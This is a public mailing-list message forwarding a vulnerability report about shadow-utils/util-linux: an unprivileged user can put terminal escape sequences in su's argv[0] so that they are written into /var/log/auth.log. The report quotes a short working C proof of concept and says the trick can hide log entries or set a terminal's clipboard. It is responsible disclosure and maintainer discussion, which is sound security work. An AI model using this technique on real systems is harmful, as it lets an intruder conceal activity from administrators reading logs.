From: Alejandro Colomar <alx@kernel.org>
To: "Serge E. Hallyn" <serge@hallyn.com>, util-linux@vger.kernel.org
Cc: "Skyler Ferrante (RIT Student)" <sjf5462@rit.edu>,
Christian Brauner <christian@brauner.io>,
Iker Pedrosa <ipedrosa@redhat.com>
Subject: Re: Escape sequences in /var/log/auth.log
Date: Sun, 3 Mar 2024 11:59:51 +0100 [thread overview]
Message-ID: <ZeRYJ6HD77humJzg@debian> (raw)
In-Reply-To: <20240302173316.GA1508977@mail.hallyn.com>
[-- Attachment #1: Type: text/plain, Size: 2148 bytes --]
Hi,
This seems to be a bug in util-linux, not shadow, so I've added
util-linux@ to the thread.
The discussion started in the email below, and was later continued in
<https://github.com/shadow-maint/shadow/pull/960>.
Have a lovely day!
Alex
On Sat, Mar 02, 2024 at 11:33:16AM -0600, Serge E. Hallyn wrote:
> On Sat, Mar 02, 2024 at 11:34:07AM -0500, Skyler Ferrante (RIT Student) wrote:
> > Hi Serge,
> >
> > I was playing around with some of the shadow-utils binaries and I
> > realized that an unprivileged user can set argv[0] to contain escape
> > sequences, and then cause it to be logged in /var/log/auth.log.
> >
> > PoC
> > ```
> > #include<stdio.h>
> > #include<unistd.h>
> > int main(int argc, char** my_argv){
> > char* prog = "/usr/bin/su";
> > char* argv[] = {"\033[33mYellow", "root", NULL};
> > char* envp[] = {NULL};
> >
> > execve(prog, argv, envp);
> > printf("Failed to exec\n");
> > }
> > ```
> > Run the binary, and type an incorrect password for root. Now run `tail
> > /var/log/auth.log`. It should contain Yellow text. This can be used to
> > hide log contents (move the cursor/delete characters). Some terminals
> > also allow setting clipboard contents through escape sequences (my
> > terminal, windows-terminal, supports this).
> >
> > It may be a good idea to refuse argv[0] if it contains binary data.
> > You could also prevent this bug by not allowing an attacker to choose
> > Prog (e.g. su could just use "su" as Prog).
> >
> > If you don't think this is a bad enough security issue to hide, I can
> > post an issue on github. I would argue that you shouldn't cat auth.log
> > or view it from tail, but I know a lot of people do.
> >
> > Cheers,
> > Skyler
>
> Terminals can be a nuisance :)
>
> I don't think we need to hide this issue, but of course definitely address
> it. I'm Cc:ing the other maintainers in case they feel differently.
>
> Did you want to send a PR to fix it?
>
> Thanks,
> -serge
--
<https://www.alejandro-colomar.es/>
Looking for a remote C programming job at the moment.
[-- Attachment #2: signature.asc --]
[-- Type: application/pgp-signature, Size: 833 bytes --]
next parent reply other threads:[~2024-03-03 10:59 UTC|newest]
Thread overview: 3+ messages / expand[flat|nested] mbox.gz Atom feed top
[not found] <CAEOG19pNSdEMjyoo_=s8-WqVs+jrmaaU=CjRb0oxKw1FG00xSA@mail.gmail.com>
[not found] ` <20240302173316.GA1508977@mail.hallyn.com>
2024-03-03 10:59 ` Alejandro Colomar [this message]
2024-03-04 12:33 ` Escape sequences in /var/log/auth.log Karel Zak
2024-03-04 13:59 ` Alejandro Colomar
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=ZeRYJ6HD77humJzg@debian \
--to=alx@kernel.org \
--cc=christian@brauner.io \
--cc=ipedrosa@redhat.com \
--cc=serge@hallyn.com \
--cc=sjf5462@rit.edu \
--cc=util-linux@vger.kernel.org \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).